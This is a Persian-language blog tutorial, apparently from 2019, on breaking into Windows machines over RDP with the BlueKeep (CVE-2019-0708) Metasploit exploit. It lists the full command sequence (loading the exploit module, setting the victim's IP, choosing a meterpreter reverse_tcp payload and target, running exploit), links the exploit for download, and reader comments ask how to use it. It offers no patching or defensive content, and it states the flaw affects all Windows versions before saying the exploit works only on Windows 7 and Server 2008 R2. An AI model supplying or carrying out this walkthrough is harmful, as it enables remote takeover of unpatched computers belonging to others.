02128428905

آموزش نفوذ به ویندوز از طریق RDP با اکسپلویت BlueKeep

 

سلام خدمت تمامی کاربران گل سایت تیم امنیتی اولترا

 

سیستم عامل ویندوز یک سیستم عامل بسیار پراستفاده در ایران و کشور های دیگر است ، که در ایران بیشتر سازمان ها و مراکز دولتی از سیستم عامل ویندوز استفاده میکنن ، شما هر جایی قدم بزارید غیرممکنه که سیستم عامل ویندوز رو نبینید ، این حجم زیاد استفاده از سیستم عامل ویندوز هم خوب نیست چون اگر آسیب پذیری از این سیستم عامل کشف بشه سیستم های زیادی رو تحت تاثیر قرار میده که بسیار خطرناکه ، تا به امروز آسیب پذیری های زیاد و مختلفی برای ویندوز کشف شده که ما در این پست میخواهیم به یکی از جدیدترین آسیب پذیری ها برای سیستم عامل ویندوز بپردازیم.

 

 

توضیحاتی راجب آسیب پذیری BlueKeep :

 

در سال ۲۰۱۹ آسیب پذیری از نوع User After Free در سرویس RDP ویندوز کشف شد ، این آسیب پذیری تمامی نسخه های ویندوز رو تحت تاثیر خودش قرار میداد و برروی سرویسی هم بود که خیلی زیاد توسط افراد استفاده میشد ، اکسپلویت این آسیب پذیری پابلیک نشده بود و دست افراد خاصی بود تا اینکه دو روز پیش  اکسپلویت مربوط به این آسیب پدیری پابلیک شد، خبر خوب اینه که این اکسپلویت برای متااسپلویت توسعه داده شده و شما به راحتی میتونید از این اکسپلویت استفاده کنید.

 

 

 

 

 

 

 

خب بریم سراغ کارمون

 

با دستور زیر متااسپلویت رو اجرا میکنیم

 

 

msfconsole

 

 

بعد از اجرای متااسپلویت با دستور زیر اکسپلویت  BlueKeep رو انتخاب میکنیم (اکسپلویت BlueKeep رو میتونید از این  لینک دانلود کنید)

 

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

 

 

بعد از انتخاب اکسپلویت با دستور زیر ای پی سیستمی که میخواهیم بهش نفوذ کنیم رو به متااسپلویت میدیم

 

set RHOSTS 192.168.1.2

 

 

با دستور زیر یک پیلود انتخاب میکنیم

 

set PAYLOAD windows/meterpreter/reverse_tcp

 

 

با دستور زیر تارگت رو انتخاب میکنیم این اکسپلویت فعلا فقط روی Windows 7 and Windows Server 2008 R2 کار میکنه پس شما باید بسته به نوع سیستم عامل تارگت یکی از گزینه ها رو انتخاب کنید

 

set TARGET 2

 

 

خب کار تمومه با دستور exploit اکسپلویت رو اجرا میکنیم و منتظر میمونیم تا دسترسی ما برقرار بشه

 

 

 

عنوان دانلود : دانلود اکسپلویت BlueKeep
دیدگاه کاربران
  • سعادتی 9 سپتامبر 2019

    ببخشید مه همی لینک ره دانلود نتوانستم لطفا بگوید از لینک چگونه استفاده کنم؟ چگونه دانلود کنم؟

    • اشکان مقدس 13 سپتامبر 2019

      سلام

      شما باید اکسپلویت رو به متااسپلویت اضافه کنید بعد استفاده کنید

ارسال دیدگاه

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *